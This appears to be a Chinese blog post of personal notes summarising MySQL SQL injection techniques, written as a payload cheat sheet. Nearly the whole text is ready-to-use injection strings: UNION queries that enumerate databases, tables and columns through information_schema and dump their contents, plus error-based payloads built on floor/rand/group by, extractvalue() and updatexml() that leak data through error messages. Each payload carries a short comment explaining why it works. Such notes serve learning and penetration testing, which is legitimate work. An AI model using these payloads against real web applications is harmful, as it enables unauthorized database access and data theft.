union联合查询注入&&报错注入

union联合查询注入

xx' union select database()
xx' union select table_name from information_schema.tables where table_schema ='DATABASE'
xx' union select column_name from information_schema.columns where table_name='TABLE'
xx' union select group_concat(*)/concat(0x7e,COLUMN1,0x7e,COLUMN2) from DATABASE.TABLE

报错注入

floor()+count(*)+concat()+rand(0)*2+group by
#其实是group by 和count(*)和rand()的化学反应,缺一不可
xx' and select count(*) from information_schema.tables group by concat(0x7e,(SELECT VERSION()),0x7e,floor(rand(0)*2))

extractvalue()
#第二个参数XPath不符合格式的符号包括其后报错
xx' and select extractvalue(1,concat(0x7e,(SELECT VERSION()),0x7e))

updatexml()
#无需使用select,其他同上
xx' and updatexml(1,concat(0x7e,(SELECT VERSION()),0x7e),1)
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 高级绕过总结
    web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,445评论 0 5
  • Mysql、Access、Sqlsever数据库注入
    本周主要学习的事SQL注入相关的细节信息,包括数据库枚举方式,判定注入点的方式,注入形式等等,具体如下: 【一、判...
    快递_小哥阅读 1,234评论 0 1
  • 什么是sql注入?
    姓名:于川皓 学号:16140210089 转载自:https://baike.baidu.com/item/sq...
    道无涯_cc76阅读 1,980评论 0 2
  • Sql注入
    Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 713评论 0 3
  • Activiti6简明教程
    一、为什么选择Activiti 二、核心7大接口、28张表 (一)7大接口 RepositoryService:提...
    jessehua阅读 127,208评论 130 194